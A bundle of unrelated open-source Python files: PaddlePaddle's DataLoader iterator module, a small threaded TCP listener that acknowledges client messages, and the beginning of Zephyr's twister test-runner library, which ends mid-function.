# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place, set_flags
# NOTE: queue has a different name in python2 and python3
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode, _in_eager_mode
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException, \
_ResumeIteration
from .flat import _flatten_batch, _restore_batch
__all__ = ['get_worker_info']
# NOTE: fix `terminate called without an active exception`
# if for loop break and program exit immediately(with no model
# layers processing) after iterate **the first few data** in
# distributed lauch mode, distributed launch will call
# terminate() to kill main process on each devices, but thread
# is still iterating to fullfill blocking queue caches, which
# may cause thread error `terminate called without an active
# exception` for terminate is a strong singal and `__del__`
# of DataLoader may not be called, so we add a global link to
# the last DataLoader instance to call `__del__` to clean up
# resources
# NOTE: cannot simply as `__del__` to CleanupFuncRegistrar,
# for this will remain a link to each DataLoader instance in
# global, and will precludes GC to auto collect DataLoader
# instance and will cause memory leak
_loader = None
def _clear_loader():
global _loader
if _loader is not None:
try:
_loader.__del__()
del _loader
except:
pass
CleanupFuncRegistrar.register(_clear_loader)
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._drop_last = loader.drop_last
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
self._sampler_iter = iter(self._index_sampler)
if self._auto_collate_batch:
self._collate_fn = loader.collate_fn or default_collate_fn
else:
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
@property
def _index_sampler(self):
if self._auto_collate_batch:
return self._batch_sampler
else:
if self._dataset_kind == _DatasetKind.MAP:
return list(range(len(self._dataset)))
else:
return _InfiniteIterableSampler(self._dataset, 1)
def __iter__(self):
return self
def __len__(self):
return len(self._batch_sampler)
def _exit_thread_expectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
if self._blocking_queue:
self._blocking_queue.kill()
class _DataLoaderIterSingleProcess(_DataLoaderIterBase):
"""
Single process implement of DataLoaderIter, loading data from
loader.data in main process
"""
def __init__(self, loader):
super(_DataLoaderIterSingleProcess, self).__init__(loader)
self._dataset_fetcher = _DatasetKind.create_fetcher(
self._dataset_kind, self._dataset, self._auto_collate_batch,
self._collate_fn, self._drop_last)
# NOTE: _structrue_infos used to record the data structure of
# batch to restore batch structure after reading Tensor
# from blocking_queue in single-process mode. Note that
# only single process is used in single-process mode, we
# can record the data structure sequencely in a list without
# recording the send and recv index
self._structure_infos = []
# NOTE: len(self._places) batch data compose as an output
# iteration, set blocking_queue can cache 2 iteration datas
# at most here
self._blocking_queue_capacity = 1 * len(self._places)
self._init_thread()
self._shutdown = False
global _loader
_loader = self
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._blocking_queue_capacity,
len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
try:
indices = next(self._sampler_iter)
# read data from dataset in mini-batch
# with paddle.fluid.dygraph.guard(place=paddle.CPUPlace()):
# read data from dataset in mini-batch
batch = self._dataset_fetcher.fetch(indices,
self._thread_done_event)
except StopIteration:
self._exit_thread_expectedly()
return
if batch is None or self._thread_done_event.is_set(): break
# flat batch and record structure infos
batch, structure = _flatten_batch(batch)
self._structure_infos.append(structure)
if self._thread_done_event.is_set(): break
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if self._thread_done_event.is_set(): break
try:
self._blocking_queue.push(array)
except:
self._exit_thread_expectedly()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
self._exit_thread_expectedly()
def __next__(self):
try:
if in_dygraph_mode():
if _in_eager_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
return data
except StopIteration:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
def _shutdown_thread(self):
if self._thread:
self._thread_done_event.set()
# NOTE: we wait for _thread exit for 3 seconds, if
# thread not exit normally, force kill it
for _ in range(3):
if self._thread.is_alive():
time.sleep(1)
else:
break
else:
if self._thread is not threading.current_thread():
self._thread.join()
self._thread = None
# python2 compatibility
def next(self):
return self.__next__()
def _try_shutdown_all(self):
if not self._shutdown:
try:
# # _blocking_queue in keep order mode holds sub-threads
# # need to release thread resources on unexpected exit
if self._blocking_queue:
self._blocking_queue.close()
self._blocking_queue = None
# NOTE: blocking queue should be closed firstly for
# blocking queue read may hang and _thread_done_event
# cannot be checked
self._shutdown_thread()
finally:
self._shutdown = True
def __del__(self):
self._try_shutdown_all()
class _DataLoaderIterMultiProcess(_DataLoaderIterBase):
def __init__(self, loader):
super(_DataLoaderIterMultiProcess, self).__init__(loader)
self._persistent_workers = loader._persistent_workers
self._resume_worker_cnt = 0
assert self._num_workers > 0, "Multi-process DataLoader " \
"invalid num_workers({})".format(self._num_workers)
# subprocess wrokers' result queue
self._data_queue = None
# data get from _data_queue will be reordered by _rcvd_idx
# for data order keeping, data index not equal _rcvd_idx
# will be cached in _task_infos
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# indices outstand as _outstanding_capacity at first, and
# blocking_queue capacity is also _outstanding_capacity.
# _outstanding_capacity here to make sure each indices_queue
# has at least 2 indices, and outstanding batch cached
# output data for at least 2 iterations(Note that len(_places)
# batches will be composed as an iteration output)
self._outstanding_capacity = 2 * max(self._num_workers,
len(self._places))
# see _try_put_indices
self._thread_lock = threading.Lock()
# init workers and indices queues and put 2 indices in each indices queue
self._init_workers()
for _ in range(self._outstanding_capacity):
self._try_put_indices()
self._init_thread()
self._shutdown = False
def _init_workers(self):
# multiprocess worker and indice queue list initial as empty
self._workers = []
self._worker_status = []
self._indices_queues = []
self._workers_idx_cycle = itertools.cycle(range(self._num_workers))
# create data_queue for workers
self._data_queue = multiprocessing.Queue()
# event for workers and thread, thread event is only need
# in multi-processing mode
self._workers_done_event = multiprocessing.Event()
self._thread_done_event = threading.Event()
for i in range(self._num_workers):
indices_queue = multiprocessing.Queue()
self._indices_queues.append(indices_queue)
worker = multiprocessing.Process(
target=_worker_loop,
args=(self._dataset, self._dataset_kind, indices_queue,
self._data_queue, self._workers_done_event,
self._auto_collate_batch, self._collate_fn,
self._drop_last, self._worker_init_fn, i,
self._num_workers, self._use_shared_memory))
worker.daemon = True
worker.start()
self._workers.append(worker)
self._worker_status.append(True)
core._set_process_pids(id(self), tuple(w.pid for w in self._workers))
_set_SIGCHLD_handler()
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except:
self._data_queue.cancel_join_thread()
self._data_queue.close()
break
def _init_thread(self):
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
# if only 1 place, do not need to keep order
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._outstanding_capacity, len(self._places) > 1)
self._reader = core.create_py_reader(
self._blocking_queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_buffer_reader, True,
self._pin_memory)
self._thread_done_event = threading.Event()
# thread event is only need in multi-processing mode
self._thread = threading.Thread(
target=self._thread_loop, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
# resume iteration in following steps
# 1. Resume workers, clear worker caches
# put _ResumeIteration to all worker as resume iteration flag
with self._thread_lock:
self._resume_worker_cnt = self._num_workers
for worker_id in range(self._num_workers):
self._indices_queues[worker_id].put(_ResumeIteration())
self._batches_outstanding += 1
# all flag will be check in _thread_loop, simply wait here
while self._resume_worker_cnt > 0:
time.sleep(0.5)
# 2. clear blocking_queue caches
# in order not to restart the thread, we just clear
# the blocking_queue cachees instead of recreating one
while self._blocking_queue.size() >= len(self._places):
if in_dygraph_mode():
if _in_eager_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
self._reader.read_next_var_list()
elif self._return_list:
self._reader.read_next_list()
else:
data = self._reader.read_next()
# 3. reset all states
self._send_idx = 0
self._rcvd_idx = 0
self._batches_outstanding = 0
self._task_infos = {}
self._structure_infos = []
# set all worker status available
self._worker_status = [True] * self._num_workers
# 4. reset _sampler_iter and put prefetch indices to start next epoch
# init workers and indices queues and put 2 indices in each indices queue
self._sampler_iter = iter(self._index_sampler)
for _ in range(self._outstanding_capacity):
self._try_put_indices()
def _shutdown_worker(self, worker_id, shutdown=False):
if self._worker_status[worker_id] or (self._persistent_workers and
shutdown):
self._indices_queues[worker_id].put(None)
self._worker_status[worker_id] = False
def _try_shutdown_all(self, timeout=None):
if not self._shutdown:
try:
self._exit_thread_expectedly()
self._clear_and_remove_data_queue()
# set _workers_done_event should be set before put None
# to indices_queue, workers wll exit on reading None from
# indices_queue
self._workers_done_event.set()
for i in range(self._num_workers):
self._shutdown_worker(i, shutdown=True)
if not self._shutdown:
for w in self._workers:
w.join(timeout)
for q in self._indices_queues:
q.cancel_join_thread()
q.close()
finally:
core._erase_process_pids(id(self))
self._shutdown = True
def _thread_loop(self, legacy_expected_place):
#NOTE(zhiqiu): Set the expected place for new thread as the same as father thread,
# and it will call platform::SetDeviceId() in c++ internally.
# If we do not set cudaDeviceId in new thread, the default cudaDeviceId will be 0,
# Which may cost hundreds of MB of GPU memory on CUDAPlace(0) if calling some cuda
# APIs in this thread.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
batch = self._get_data()
if not self._thread_done_event.is_set():
if batch is None:
self._exit_thread_expectedly()
else:
if isinstance(batch, _ResumeIteration):
assert self._resume_worker_cnt > 0
self._resume_worker_cnt -= 1
continue
try:
# pack as LoDTensorArray
array = core.LoDTensorArray()
if self._use_shared_memory:
for tensor in batch:
array.append(tensor)
else:
# LoDTensor not in shared memory is not
# serializable, cannot be create in workers
for slot in batch:
if isinstance(slot, paddle.Tensor):
slot = slot.value().get_tensor()
elif not isinstance(slot, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(slot, core.CPUPlace())
slot = tmp
array.append(slot)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except Exception as e:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
finally:
self._rcvd_idx += 1
def _get_data(self):
while not self._thread_done_event.is_set():
# For IterableDataset, batch indices is generated infinitely
# for each worker to raise StopIteration, but a StopIteration
# raising process will discard a batch indices which is count
# in _send_idx but will not increase _rcvd_idx, so we check
# whether the worker is still alive here to skip the discarded
# batch indices and increase _rcvd_idx
if self._dataset_kind == _DatasetKind.ITER:
while self._rcvd_idx < self._send_idx:
info = self._task_infos[self._rcvd_idx]
if len(info) == 3 or self._worker_status[info[0]]:
break
del self._task_infos[self._rcvd_idx]
self._rcvd_idx += 1
self._batches_outstanding -= 1
else:
# NOTE: when _rcvd_idx catch up _send_idx, which means
# one of following:
# 1. all 2 * num_workers batches have been loaded
# and stored in _blocking_queue
# 2. all data drained
# we need to let _thread blocking at _data_queue
# get_data to inoccupy CPU, otherwise may occupy
# CPU time for model running
# NOTE: in persistent workers mode, do not check data
# drained here, simply let it go to _data_queue
# reading to get _ResumeIteration
if not self._persistent_workers:
# NOTE: _rcvd_idx and _send_idx only record batches among
# workers, if batches among workers drained, there
# may also be data in blocking queue
if self._batches_outstanding < len(self._places):
return None
if self._rcvd_idx in self._task_infos and \
len(self._task_infos[self._rcvd_idx]) == 3:
info = self._task_infos.pop(self._rcvd_idx)
self._structure_infos.append(info[2])
return info[1]
try:
# [ avoid hang ]: main process may blocking at _reader.read_next when
# KeyboardInterrupt, we do following tradeoff:
# 1. get data with timeout, MP_STATUS_CHECK_INTERVAL(5s) as timeout
# default, if KeyboardInterrupt blocking, failed workers will be
# checked and raise RuntimeError to quit DataLoader in timeout
# exception handling.
# 2. if get data timeout and check workers all alive, continue to
# get data again
data = self._data_queue.get(timeout=self._timeout)
except Exception as e:
# check if thread done event set when waiting data
if self._thread_done_event.is_set():
continue
# check failed workers
failed_workers = []
for i, w in enumerate(self._workers):
if self._worker_status[i] and not w.is_alive():
failed_workers.append(w)
self._shutdown_worker(i)
if len(failed_workers) > 0:
self._exit_thread_unexpectedly()
pids = ', '.join(str(w.pid) for w in failed_workers)
raise RuntimeError("DataLoader {} workers exit unexpectedly, " \
"pids: {}".format(len(failed_workers), pids))
# get(timeout) will call _poll(timeout) and may raise IOError
if isinstance(e, queue.Empty) or isinstance(e, IOError):
# continue on timeout to keep getting data from queue
continue
self._exit_thread_unexpectedly()
logging.error("DataLoader reader thread failed({}) to read data from " \
"workers' result queue.".format(e))
six.reraise(*sys.exc_info())
else:
if self._dataset_kind == _DatasetKind.ITER and isinstance(
data, _IterableDatasetStopIteration):
# if a worker get StopIteraion, we shutdown this worker,
# note that this batch indices to trigger StopIteration
# is discard, outstanding batch number should be decrease
# and another indices should be put for other workers
# may still working.
if self._persistent_workers:
self._worker_status[data.worker_id] = False
else:
self._shutdown_worker(data.worker_id)
self._batches_outstanding -= 1
self._try_put_indices()
continue
idx, batch, structure = data
if isinstance(idx, _ResumeIteration) and batch is None \
and structure is None:
return idx
if isinstance(batch, _WorkerException):
self._exit_thread_unexpectedly()
batch.reraise()
if idx == self._rcvd_idx:
del self._task_infos[idx]
self._structure_infos.append(structure)
return batch
else:
self._task_infos[idx] += (batch, structure)
continue
def _try_put_indices(self):
assert self._batches_outstanding <= self._outstanding_capacity, \
"too many indices have been put to queue"
# In multi-process mode for IterableDataset, _try_put_indices will
# be called both in main process(for our implement has blocking queue,
# and blocking queue read is in main process) and thread, which may
# cause error following error
# 1. "ValueError: generator already executing" in next(self._sampler_iter)
# 2. re-enter in increase _send_idx
# add a lock for threading save, for _try_put_indices is only a slight
# function which is not in data reading pipeline, this lock almost no
# influence on performance
with self._thread_lock:
try:
indices = next(self._sampler_iter)
except StopIteration:
return
for i in range(self._num_workers):
worker_idx = next(self._workers_idx_cycle)
if self._worker_status[worker_idx]:
break
else:
return
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._task_infos[self._send_idx] = (worker_idx, )
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def _shutdown_on_exit(self):
self._try_shutdown_all(1)
def __next__(self):
try:
# _batches_outstanding here record the total batch data number
# in 'from after _try_put_indices to beforeoutput data', this
# value should be _outstanding_capacity if data is not drained,
# if _batches_outstanding is less than _places number, there are
# no enough data to generate next output, close blocking_queue and
# set _thread_done_event here, py_reader will raise StopIteration,
# end workers and indices_queues in StopIteration handling
if self._batches_outstanding < len(self._places):
if self._persistent_workers:
raise StopIteration
else:
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
if _in_eager_mode():
data = core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
data = self._reader.read_next_var_list()
data = _restore_batch(data, self._structure_infos.pop(0))
else:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
data = [
_restore_batch(d, s)
for d, s in zip(data, self._structure_infos[:len(
self._places)])
]
self._structure_infos = self._structure_infos[len(
self._places):]
# static graph organized data on multi-device with list, if
# place number is 1, there is only 1 device, extra the data
# from list for devices to be compatible with dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
if not self._persistent_workers:
self._reader.shutdown()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
simple_tcp_server.py
|
import socket
import threading
#adapted from Blackhat Python
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip, bind_port)
#this is our client handling thread
def handle_client(client_socket):
#print out what the client sends
request = client_socket.recv(1024)
print "[*] Received %s" % request
#send back a packet
client_socket.send("ACK!")
client_socket.close()
while True:
client,addr = server.accept()
print "[*] Accepted connection from: %s:%d" % (addr[0], addr[1])
#spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testcase.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
If testsuite was broken by some error (e.g. timeout) it is necessary to
add information about next testcases, which were not be
performed due to this error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
def _set_skip_reason(self, harness_state):
"""
If testcase written in ztest framework is skipped by "ztest_test_skip()"
function, then such testcase is marked in instance.results dict as
"SKIP", but reason of this sipping still "Unknown". This method pick up
this situation and complete the instance.reason properly.
"""
harness_state_pass = "passed"
harness_testcase_result_skip = "SKIP"
instance_reason_unknown = "Unknown"
